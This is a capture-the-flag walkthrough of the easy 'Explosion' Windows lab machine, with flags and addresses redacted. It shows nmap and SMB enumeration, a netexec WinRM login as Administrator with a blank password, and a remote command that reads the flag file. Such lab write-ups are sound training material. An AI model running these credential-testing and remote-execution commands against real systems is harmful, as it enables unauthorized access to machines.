Walkthrough -- Explosion (<TARGET>)

Technical Walkthrough

Walkthrough -- Explosion (<TARGET>)

Machine Info

• Name: Explosion
• OS: Windows Server 2019 (Build 17763)
• Difficulty: Easy (Starting Point)
• IP: <TARGET>

Enumeration

Initial Nmap Scan

nmap -sC -sV -oN ./nmap/initial <TARGET>

Open ports: 135 (MSRPC), 139 (NetBIOS), 445 (SMB), 3389 (RDP)

Full TCP Scan

nmap -p<redacted> --min-rate 5000 -oN ./nmap/allports <TARGET>

Additional ports: 5985 (WinRM), 47001 (WinRM alt), 49664-49671 (RPC high ports)

SMB Enumeration

smbclient -N -L //<TARGET>/
netexec smb <TARGET> --shares -u 'guest' -p ''

• Guest access works but only reads IPC$
• No custom shares -- only ADMIN$, C$, IPC$
• Dead end for file-based intel

Exploitation

Blank Password on Administrator via WinRM

The box name "Explosion" and the Easy/Starting Point difficulty suggest trying default/blank credentials.

netexec winrm <TARGET> -u Administrator -p ''

Output:

WINRM  <TARGET>  5985  <secret redacted>  [+] Explosion\Administrator: (Pwn3d!)

Administrator has a blank password. WinRM gives us direct command execution as SYSTEM-equivalent.

Flag Capture

netexec winrm <TARGET> -u Administrator -p '' -x 'type C:\Users\Administrator\Desktop\flag.txt'

Flag: <hash redacted>

Lessons Learned

1. Always try blank/default <password redacted> on Easy boxes, especially when RDP or WinRM is exposed.
2. WinRM (5985) is an excellent alternative to RDP for command execution -- no GUI needed.
3. netexec is the go-to tool for testing credentials across Windows services (SMB, WinRM, RDP, MSSQL).
4. The box teaches the concept of remote desktop services and the danger of blank/default Administrator <password redacted>.

Tools Used

• nmap (port scanning and service detection)
• smbclient (SMB null session enumeration)
• netexec (credential testing and command execution via WinRM)

Source-Backed Dossier

The sections below are merged from companion Markdown notes for the same case. They are rendered after sanitization so the article stays precise without publishing raw flags, credentials, or target-specific secrets.

Notes

Scope

• Target: <TARGET> (Explosion)
• OS: Windows Server 2019 Build 17763
• Difficulty: Easy (Starting Point)
• Attacker VPN IP: <TARGET>
• Pwnbox: x08@<TARGET>
• Start Time: 2026-05-05
• Solve Time: ~5 minutes

Open Services

Key Findings

1. SMB guest access allowed but no interesting shares (only ADMIN$, C$, IPC$)
2. Administrator account has a BLANK password
3. WinRM accessible with Administrator:'' -- Pwn3d!
4. RDP also accessible with same creds (not tested interactively since WinRM was sufficient)

Attack Path

1. Nmap scan reveals RDP (3389) and WinRM (5985)
2. netexec winrm with Administrator and blank password: <redacted>
3. Flag read directly via WinRM command execution

Flags

• flag.txt: <hash redacted>